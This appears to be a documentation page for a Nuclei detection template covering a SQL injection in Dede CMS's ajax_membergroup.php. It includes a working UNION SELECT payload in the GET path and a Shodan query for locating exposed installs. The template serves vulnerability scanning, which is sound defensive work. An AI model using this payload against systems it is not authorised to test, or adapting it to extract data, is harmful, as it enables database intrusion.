Dede CMS - SQL Injection
ID: dedecms-membergroup-sqli
Severity: critical
Author: pikpikcu
Tags: sqli,dedecms
Description
Section titled “Description”Dede CMS contains a SQL injection vulnerability which allows remote unauthenticated users to inject arbitrary SQL statements via the ajax_membergroup.php endpoint and the membergroup parameter.
YAML Source
Section titled “YAML Source”id: dedecms-membergroup-sqli
info: name: Dede CMS - SQL Injection author: pikpikcu severity: critical description: Dede CMS contains a SQL injection vulnerability which allows remote unauthenticated users to inject arbitrary SQL statements via the ajax_membergroup.php endpoint and the membergroup parameter. reference: - http://www.dedeyuan.com/xueyuan/wenti/1244.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"DedeCms" product: dedecms vendor: dedecms tags: sqli,dedecmsvariables: num: "999999999"
http: - method: GET path: - "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{num}})+--+@`'`"
matchers-condition: and matchers: - type: word words: - '{{md5({{num}})}}' part: body
- type: status status: - 200# digest: 490a0046304402206ed5a047a147f22d4a17a32aca810ed327eff8aed73621c559d1b9ef33c51a23022037fa8d9aa32a6394af1522a6ab3a131ca997783702eec312013fa892c6fbff57:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml"